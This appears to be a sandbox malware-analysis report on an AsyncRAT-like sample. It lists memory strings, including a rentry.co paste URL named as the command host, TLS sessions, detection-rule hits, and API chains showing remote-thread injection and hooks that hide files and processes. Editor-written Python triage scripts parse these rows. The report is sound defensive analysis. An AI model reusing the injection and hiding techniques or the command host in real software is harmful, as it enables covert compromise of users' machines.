Source: svchost.exe, 0000000B.00000002.2647979529.0000013DE1902000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/px
Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/resetpw.srf
Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/resetpw.srff
Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/retention.srf
Source: svchost.exe, 0000000B.00000002.2645982875.0000013DE18D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2668258474.0000013DE2844000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com:443/RST2.srf
Source: svchost.exe, 0000000B.00000002.2668258474.0000013DE2844000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com:443/ppsecure/deviceaddcredential.srf
Source: svchost.exe, 0000000B.00000002.2671562687.0000013DE28A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.comnui
Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
Source: svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/MSARST2.srf=
Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJ
Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.
Source: svchost.exe, 0000000B.00000003.1368955150.0000013DE2110000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID
Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-
Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%
Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1368955150.0000013DE2110000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
Source: svchost.exe, 0000000B.00000003.1369948869.0000013DE2127000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMM
Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfen
Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1368955150.0000013DE2110000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
Source: svchost.exe, 0000000B.00000003.1368955150.0000013DE2110000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfRE
Source: wzcsapi.exe, 00000003.00000002.2644119365.00000000028C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rentry.co/tranr/raw
Source: svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://signup.live.com/signup.aspx
Source: unknown | Network traffic detected: HTTP traffic on port 443, seen in both directions (client port -> 443 and 443 -> client port) for each of these 45 client ports on the analysis host: 49731, 49767, 49773, 49790, 49796, 52287, 52294, 52317, 52323, 52344, 52350, 52368, 52375, 52397, 52403, 52419, 52430, 52447, 52458, 52474, 52481, 52484, 52485, 52486, 52487, 52489, 52490, 52491, 52492, 52493, 52495, 52496, 52497, 52498, 52499, 52500, 52501, 52502, 52503, 52504, 52505, 52506, 52507, 52509, 52510
Source: unknown | HTTPS traffic detected: 104.26.2.16:443 -> 192.168.2.7:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 169.197.85.95:443 -> 192.168.2.7:49767 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.19.58.157:443 -> 192.168.2.7:52493 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.19.58.157:443 -> 192.168.2.7:52495 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.19.58.157:443 -> 192.168.2.7:52497 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.19.58.157:443 -> 192.168.2.7:52500 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.19.58.157:443 -> 192.168.2.7:52504 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.19.58.157:443 -> 192.168.2.7:52509 version: TLS 1.2
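Most of the URL rows above are noise: they are Microsoft-account strings (login.live.com, login.microsoftonline.com) sitting in svchost.exe memory, and several carry trailing junk bytes from the string extractor (InlineDesktop.srfm, SHA1Auth.srf57, login.live.comnui). The row that matters for this sample is the rentry.co raw-paste URL found in wzcsapi.exe, which is the pastebin-style C2 host the Signatures section refers to. The script below is an added triage example written for this page (editor's code, not part of the Joe Sandbox report); it parses rows in the shape used above, attributes each URL to the process and PID whose memory dump it came from, flags paste-service hosts, URLs in non-system processes and unrecognised hosts, and counts TLS sessions per server IP. The host lists and the system-process set are the editor's assumptions, and the embedded rows are a constructed subset of the rows above.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample: a subset of this report's rows, in the shape they appear on the page
# (the column separator between "Source:" and the finding is often lost on extraction).
SAMPLE_LINES = """\
Source: wzcsapi.exe, 00000003.00000002.2644119365.00000000028C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/tranr/raw
Source: svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
Source: svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srff
Source: svchost.exe, 0000000B.00000002.2671562687.0000013DE28A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comnui
Source: svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
Source: unknownHTTPS traffic detected: 104.26.2.16:443 -> 192.168.2.7:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.19.58.157:443 -> 192.168.2.7:52493 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.19.58.157:443 -> 192.168.2.7:52495 version: TLS 1.2
""".splitlines()

# Row shapes; the "|" separator and surrounding whitespace are optional so both the
# fused and the cleaned-up form of the rows parse.
STRING_ROW = re.compile(
    r"^Source:\s*(?P<src>.*?)\s*\|?\s*String found in binary or memory:\s*(?P<url>\S+)\s*$")
HTTPS_ROW = re.compile(
    r"HTTPS traffic detected:\s*(?P<sip>[\d.]+):(?P<sport>\d+)\s*->\s*(?P<cip>[\d.]+):(?P<cport>\d+)")
# One "<process>.exe, <8-hex PID>.<...>.sdmp" token per memory dump in the source column.
DUMP_TOKEN = re.compile(r"(?P<proc>[\w.\-]+\.exe),\s*(?P<pid>[0-9A-Fa-f]{8})\.")

# Assumed classification lists (editor's choice for this example, not from the report).
PASTE_HOSTS = {"rentry.co", "pastebin.com", "paste.ee", "hastebin.com"}
MS_IDENTITY_HOSTS = {"login.live.com", "login.microsoftonline.com", "signup.live.com"}
SYSTEM_PROCESSES = {"svchost.exe", "lsass.exe", "winlogon.exe", "dwm.exe",
                    "explorer.exe", "WerFault.exe"}


def classify_host(url):
    host = (urlparse(url).hostname or "").lower()
    if host in PASTE_HOSTS:
        return "paste-site"
    if host in MS_IDENTITY_HOSTS:
        return "microsoft-identity"
    # Includes hosts damaged by trailing string bytes, e.g. login.live.comnui.
    return "other"


def parse_string_hits(lines):
    """Yield (process, pid_hex, url) once per distinct process/PID/URL triple."""
    seen = set()
    for line in lines:
        m = STRING_ROW.match(line.strip())
        if not m:
            continue
        for proc, pid in DUMP_TOKEN.findall(m["src"]):
            key = (proc, pid, m["url"])
            if key not in seen:
                seen.add(key)
                yield key


def triage(lines):
    """Return (hosts_by_process, flagged). flagged lists the URL hits that came from a
    paste/raw-text service, from a non-system process, or from an unrecognised host."""
    hosts = defaultdict(set)
    flagged = []
    for proc, pid, url in parse_string_hits(lines):
        cat = classify_host(url)
        hosts[proc].add(urlparse(url).hostname)
        reasons = []
        if cat == "paste-site":
            reasons.append("paste-site URL (typical XWorm/AsyncRAT C2 config host)")
        if proc not in SYSTEM_PROCESSES:
            reasons.append("non-system process")
        if cat == "other":
            reasons.append("unrecognised host, review manually")
        if reasons:
            flagged.append((proc, pid, url, "; ".join(reasons)))
    return dict(hosts), flagged


def https_sessions(lines):
    """Map server IP -> sorted client ports, i.e. one entry per TLS session to that peer."""
    sessions = defaultdict(set)
    for line in lines:
        m = HTTPS_ROW.search(line)
        if m:
            sessions[m["sip"]].add(int(m["cport"]))
    return {ip: sorted(ports) for ip, ports in sessions.items()}


if __name__ == "__main__":
    hosts, flagged = triage(SAMPLE_LINES)
    for proc, pid, url, why in flagged:
        print(f"{proc} (PID 0x{pid}): {url}  <- {why}")
    for ip, ports in https_sessions(SAMPLE_LINES).items():
        print(f"{ip}: {len(ports)} TLS session(s) from client ports {ports}")
```

Run against the full report, the script reduces the fifty-odd URL rows to one real finding (rentry.co in wzcsapi.exe, PID 3) plus a short list of damaged hostnames to eyeball; the TLS count per peer shows the six sessions to 162.19.58.157 separately from the single sessions to the two other servers.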

System Summary

Source: 3.2.wzcsapi.exe.28cf290.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 3.2.wzcsapi.exe.1bee0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 00000003.00000002.2674092147.000000001BEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: 00000003.00000002.2644119365.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT | Author: ditekSHen
Source: C:\Users\user\Desktop\r8k29DBraE.exe | Code function: 1_2_000002616F5928DC NtEnumerateValueKey,NtEnumerateValueKey
Source: C:\Users\user\Desktop\wzcsvc.exe | Code function: 4_2_00007FF6B5AD10C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle
Source: C:\Windows\System32\winlogon.exe | Code function: 6_2_000001CA7D1E28DC NtEnumerateValueKey,NtEnumerateValueKey
Source: C:\Windows\System32\WerFault.exe | Code function: 8_2_00000265B3C02544 NtQueryDirectoryFileEx,GetFileType,StrCpyW
Source: C:\Windows\System32\WerFault.exe | Code function: 8_2_00000265B3C02034 NtQuerySystemInformation,StrCmpNIW
Source: C:\Windows\System32\lsass.exe | Code function: 9_2_0000017D2DD52034 NtQuerySystemInformation,StrCmpNIW
Source: C:\Windows\System32\lsass.exe | Code function: 9_2_0000017D2DD52544 NtQueryDirectoryFileEx,GetFileType,StrCpyW
Source: C:\Windows\System32\svchost.exe | Code function: 11_2_0000013DE2722034 NtQuerySystemInformation,StrCmpNIW
Source: C:\Windows\System32\dwm.exe | Code function: 14_2_00000262F1CA28DC NtEnumerateValueKey,NtEnumerateValueKey
Source: C:\Windows\System32\svchost.exe | Code function: 15_2_000002234E152544 NtQueryDirectoryFileEx,GetFileType,StrCpyW
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_000002287AD72034 NtQuerySystemInformation,StrCmpNIW
Source: C:\Windows\System32\svchost.exe | Code function: 18_2_000002287AD72544 NtQueryDirectoryFileEx,GetFileType,StrCpyW
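The Code function rows above carry two separate signals worth pulling out of a report like this. The wzcsvc.exe function at 4_2_00007FF6B5AD10C0 opens a process, inspects its token (OpenProcessToken, GetTokenInformation, GetSidSubAuthority) and then runs VirtualAllocEx, WriteProcessMemory, NtCreateThreadEx, which is the remote-thread injection sequence the Signatures section describes. Separately, three tiny functions recur at the same page offset in unrelated processes: NtQuerySystemInformation+StrCmpNIW at offset 0x034 and NtQueryDirectoryFileEx+GetFileType+StrCpyW at 0x544 in WerFault.exe, lsass.exe and svchost.exe, and NtEnumerateValueKey at 0x8DC in the sample itself, winlogon.exe and dwm.exe. Identical code at identical page offsets across processes is what a single injected hook blob looks like, and the enumeration syscalls it wraps match the file, process and registry hiding signatures. The script below is an added example written for this page (editor's code, not part of the Joe Sandbox report) that extracts both signals from rows in this shape. The API sets, the "hides" labels, the reading of the token calls as an integrity-level check, and the system-process list are the editor's assumptions; the embedded rows are a constructed subset of the rows above.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of this report's "Code function" rows, as extracted
# (source and finding fused; the function id repeated after the API list).
SAMPLE_ROWS = r"""
Source: C:\Users\user\Desktop\r8k29DBraE.exeCode function: 1_2_000002616F5928DC NtEnumerateValueKey,NtEnumerateValueKey,1_2_000002616F5928DC
Source: C:\Users\user\Desktop\wzcsvc.exeCode function: 4_2_00007FF6B5AD10C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,4_2_00007FF6B5AD10C0
Source: C:\Windows\System32\winlogon.exeCode function: 6_2_000001CA7D1E28DC NtEnumerateValueKey,NtEnumerateValueKey,6_2_000001CA7D1E28DC
Source: C:\Windows\System32\WerFault.exeCode function: 8_2_00000265B3C02544 NtQueryDirectoryFileEx,GetFileType,StrCpyW,8_2_00000265B3C02544
Source: C:\Windows\System32\WerFault.exeCode function: 8_2_00000265B3C02034 NtQuerySystemInformation,StrCmpNIW,8_2_00000265B3C02034
Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD52034 NtQuerySystemInformation,StrCmpNIW,9_2_0000017D2DD52034
Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD52544 NtQueryDirectoryFileEx,GetFileType,StrCpyW,9_2_0000017D2DD52544
Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000013DE2722034 NtQuerySystemInformation,StrCmpNIW,11_2_0000013DE2722034
Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CA28DC NtEnumerateValueKey,NtEnumerateValueKey,14_2_00000262F1CA28DC
Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002234E152544 NtQueryDirectoryFileEx,GetFileType,StrCpyW,15_2_000002234E152544
""".strip().splitlines()

# "<pid>_<run>_<16-hex address>" followed by the comma-separated API list; the optional
# "|" lets the cleaned-up form of the rows parse as well.
ROW = re.compile(
    r"^Source:\s*(?P<path>\S.*?\.exe)\s*\|?\s*Code function:\s*"
    r"(?P<fid>(?P<pid>\d+)_\d+_(?P<addr>[0-9A-Fa-f]{16}))\s+(?P<rest>.*?)\s*$")

# Assumed API groupings for this example (editor's choice).
INJECTION_ALLOC = {"VirtualAllocEx", "NtAllocateVirtualMemory"}
INJECTION_WRITE = {"WriteProcessMemory", "NtWriteVirtualMemory"}
INJECTION_EXEC = {"NtCreateThreadEx", "CreateRemoteThread", "RtlCreateUserThread",
                  "QueueUserAPC", "NtQueueApcThread", "SetThreadContext"}
TOKEN_INSPECT = {"OpenProcessToken", "GetTokenInformation", "GetSidSubAuthority"}
ENUM_HOOK_TARGETS = {"NtQueryDirectoryFileEx": "directory listing",
                     "NtQueryDirectoryFile": "directory listing",
                     "NtQuerySystemInformation": "process listing",
                     "NtEnumerateValueKey": "registry values",
                     "NtEnumerateKey": "registry keys"}
FILTER_HELPERS = {"StrCmpNIW", "StrCmpIW", "StrStrA", "StrStrW", "StrCpyW", "lstrcmpiW"}


def parse_rows(lines):
    """One record per row that carries an API list; rows without one are skipped."""
    records = []
    for line in lines:
        m = ROW.match(line.strip())
        if not m:
            continue
        apis = [a for a in m["rest"].split(",") if a and a != m["fid"]]
        if not apis:
            continue
        records.append({"process": m["path"].rsplit("\\", 1)[-1], "pid": int(m["pid"]),
                        "fid": m["fid"], "addr": int(m["addr"], 16), "apis": apis})
    return records


def find_injectors(records):
    """Functions that allocate, write and start execution in another process."""
    found = []
    for r in records:
        s = set(r["apis"])
        if s & INJECTION_ALLOC and s & INJECTION_WRITE and s & INJECTION_EXEC:
            note = "remote alloc + write + execute"
            if TOKEN_INSPECT <= s:
                note += "; reads the target's token SIDs first (assumed: integrity-level check)"
            found.append((r["process"], r["fid"], note))
    return found


def shared_code(records):
    """Group functions by (page offset, API chain) and keep groups seen in >1 process:
    the same code mapped at the same page offset in unrelated processes."""
    groups = defaultdict(set)
    for r in records:
        groups[(r["addr"] & 0xFFF, tuple(r["apis"]))].add(r["process"])
    return {k: sorted(v) for k, v in groups.items() if len(v) > 1}


def enumeration_hooks(records):
    """For each shared code body, name the enumeration syscalls it wraps."""
    hooks = []
    for (offset, apis), procs in shared_code(records).items():
        targets = sorted({ENUM_HOOK_TARGETS[a] for a in apis if a in ENUM_HOOK_TARGETS})
        if targets:
            hooks.append({"offset": offset, "hides": targets, "processes": procs,
                          "filters_by_string": bool(set(apis) & FILTER_HELPERS)})
    return sorted(hooks, key=lambda h: h["offset"])


if __name__ == "__main__":
    recs = parse_rows(SAMPLE_ROWS)
    for proc, fid, note in find_injectors(recs):
        print(f"injector: {proc} {fid}: {note}")
    for h in enumeration_hooks(recs):
        print(f"hook at page offset 0x{h['offset']:03X} hides {h['hides']} in {h['processes']}")
```

The page-offset grouping is the part worth keeping in a triage toolkit: a hook blob lands at a different base in every process, so full addresses never match across rows, but the low twelve bits survive any page-aligned mapping and the API chain disambiguates coincidental collisions.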
Source: C:\Windows\System32\lsass.exe | File created: C:\Windows\system32\Microsoft\Protect\S-1-5-18\User\7415a32d-d2c0-4e8d-943e-3e817e4bf894
Source: C:\Windows\System32\lsass.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
Source: C:\Windows\System32\lsass.exe | File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
Source: C:\Windows\System32\lsass.exe | File deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
Source: C:\Users\user\Desktop\r8k29DBraE.exe | Code function: 1_2_000002616F313E18
Source: C:\Users\user\Desktop\r8k29DBraE.exe | Code function: 1_2_000002616F30D650
Source: C:\Users\user\Desktop\r8k29DBraE.exe | Code function: 1_2_000002616F301F40
Source: C:\Users\user\Desktop\r8k29DBraE.exe | Code function: 1_2_000002616F5A6218
Source: C:\Users\user\Desktop\r8k29DBraE.exe | Code function: 1_2_000002616F5A4A18
Source: C:\Users\user\Desktop\r8k29DBraE.exe | Code function: 1_2_000002616F5A6100
Source: C:\Users\user\Desktop\r8k29DBraE.exe | Code function: 1_2_000002616F5A6100
Source: C:\Users\user\Desktop\r8k29DBraE.exe | Code function: 1_2_000002616F59E250
Source: C:\Users\user\Desktop\r8k29DBraE.exe | Code function: 1_2_000002616F592B40
Source: C:\Users\user\Desktop\r8k29DBraE.exe | Code function: 1_2_00007FFAAC560C5E
Source: C:\Users\user\Desktop\wzcsapi.exe | Code function: 3_2_00007FFAAC5981B6
Source: C:\Users\user\Desktop\wzcsapi.exe | Code function: 3_2_00007FFAAC598F62
Source: C:\Users\user\Desktop\wzcsapi.exe | Code function: 3_2_00007FFAAC591485
Source: C:\Users\user\Desktop\wzcsvc.exe | Code function: 4_2_0000023EB69F1F40
Source: C:\Users\user\Desktop\wzcsvc.exe | Code function: 4_2_0000023EB6A03E18
Source: C:\Users\user\Desktop\wzcsvc.exe | Code function: 4_2_0000023EB69FD650
Source: C:\Users\user\Desktop\wzcsvc.exe | Code function: 4_2_00007FF6B5AD2264
Source: C:\Users\user\Desktop\wzcsvc.exe | Code function: 4_2_00007FF6B5AD14D0
Source: C:\Users\user\Desktop\wzcsvc.exe | Code function: 4_2_00007FF6B5AD2558
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_0000021681981F40
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_0000021681993E18
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002168198D650
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00000216819B2B40
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00000216819C4A18
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_00000216819BE250
Source: C:\Windows\System32\winlogon.exe | Code function: 6_2_000001CA7D1C3E18
Source: C:\Windows\System32\winlogon.exe | Code function: 6_2_000001CA7D1BD650
Source: C:\Windows\System32\winlogon.exe | Code function: 6_2_000001CA7D1B1F40
Source: C:\Windows\System32\winlogon.exe | Code function: 6_2_000001CA7D1F6218
Source: C:\Windows\System32\winlogon.exe | Code function: 6_2_000001CA7D1F4A18
Source: C:\Windows\System32\winlogon.exe | Code function: 6_2_000001CA7D1EE250
                Source: C:\Windows\System32\winlogon.exeCode function: 6_2_000001CA7D1F61006_2_000001CA7D1F6100
                Source: C:\Windows\System32\winlogon.exeCode function: 6_2_000001CA7D1F61006_2_000001CA7D1F6100
                Source: C:\Windows\System32\winlogon.exeCode function: 6_2_000001CA7D1E2B406_2_000001CA7D1E2B40
                Source: C:\Windows\System32\WerFault.exeCode function: 8_2_00000265B3C160E88_2_00000265B3C160E8
                Source: C:\Windows\System32\WerFault.exeCode function: 8_2_00000265B3C02B408_2_00000265B3C02B40
                Source: C:\Windows\System32\WerFault.exeCode function: 8_2_00000265B3C0E2508_2_00000265B3C0E250
                Source: C:\Windows\System32\WerFault.exeCode function: 8_2_00000265B3C162188_2_00000265B3C16218
                Source: C:\Windows\System32\WerFault.exeCode function: 8_2_00000265B3C14A188_2_00000265B3C14A18
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD21F409_2_0000017D2DD21F40
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD2D6509_2_0000017D2DD2D650
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD33E189_2_0000017D2DD33E18
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD660E89_2_0000017D2DD660E8
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD52B409_2_0000017D2DD52B40
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD5E2509_2_0000017D2DD5E250
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD662189_2_0000017D2DD66218
                Source: C:\Windows\System32\lsass.exeCode function: 9_2_0000017D2DD64A189_2_0000017D2DD64A18
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000022F4B8F1F4010_2_0000022F4B8F1F40
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000022F4B8FD65010_2_0000022F4B8FD650
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000022F4B903E1810_2_0000022F4B903E18
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000022F4B922B4010_2_0000022F4B922B40
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000022F4B92E25010_2_0000022F4B92E250
                Source: C:\Windows\System32\svchost.exeCode function: 10_2_0000022F4B934A1810_2_0000022F4B934A18
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000013DE273621811_2_0000013DE2736218
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000013DE2734A1811_2_0000013DE2734A18
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000013DE272E25011_2_0000013DE272E250
                Source: C:\Windows\System32\svchost.exeCode function: 11_2_0000013DE2722B4011_2_0000013DE2722B40
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CB621814_2_00000262F1CB6218
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CB4A1814_2_00000262F1CB4A18
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CB610014_2_00000262F1CB6100
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CB610014_2_00000262F1CB6100
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CA2B4014_2_00000262F1CA2B40
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1CAE25014_2_00000262F1CAE250
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1EA1F4014_2_00000262F1EA1F40
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1EAD65014_2_00000262F1EAD650
                Source: C:\Windows\System32\dwm.exeCode function: 14_2_00000262F1EB3E1814_2_00000262F1EB3E18
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002234E133E1815_2_000002234E133E18
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002234E12D65015_2_000002234E12D650
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002234E121F4015_2_000002234E121F40
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002234E16621815_2_000002234E166218
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002234E164A1815_2_000002234E164A18
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002234E15E25015_2_000002234E15E250
                Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002234E152B4015_2_000002234E152B40
